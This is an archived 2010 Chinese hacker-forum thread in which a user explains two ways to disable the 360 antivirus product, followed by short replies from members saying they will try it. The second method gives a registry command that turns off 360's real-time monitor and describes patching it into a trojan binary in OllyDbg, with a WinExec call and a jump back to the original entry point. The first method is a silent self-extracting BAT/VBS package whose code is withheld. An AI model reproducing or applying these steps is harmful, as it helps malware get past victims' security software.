绿色兵团's Archiver

绿色兵团
 

zhangdi2009 发表于 2010-2-10 18:59

干掉360的两种方法

两种方法:
(一) BAT+VBS+RAR
BAT代码如下:

(代码一贴上来,居然被网站监控为不安全信息,不让发布,晕4)
然后用WINRAR建立自解压文件
路径:c:\windows
解压后运行:vbs文件名.vbs
安静模式:全部隐藏
覆盖方式:覆盖所有文件
做完即可。

(二) ASM汇编
这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。
再找一个小空段,记下地址,假设为40116A
写入:
Push 401180 (也就是那个改动的地址)
Call WinExec
Jmp 原程序入口点(在OD右边)

暗夜怨曲 发表于 2010-2-10 19:12

有空试试  看看好用不

yongzhewuju 发表于 2010-2-10 22:14

我也试试看看好用不。

wd102185 发表于 2010-2-10 23:05

恩  思路不错 把代码发来看看

怒佛 发表于 2010-2-10 23:59

路过。支持下

liuxin8888 发表于 2010-2-11 00:43

路过……………………

1271666896 发表于 2010-2-11 07:55

- -好帖。。

Acme灬浪子 发表于 2010-2-11 12:35

飘过,研究研究去。

小~少~珍 发表于 2010-3-4 00:03

要学习啊

flyde 发表于 2010-3-4 08:16

回帖是一种美德,一种友谊,一种礼仪, 回帖是网络最美丽的行为!

剑影飞扬 发表于 2010-3-4 09:22

回帖是网络最美丽的行为!:lol

colderstar 发表于 2010-3-14 08:25

飘过………………………………:)

sky138137 发表于 2010-3-20 17:13

:@:@:@:@:@

页: [1]

Powered by Discuz! Archiver 7.1  © 2001-2009 Comsenz Inc.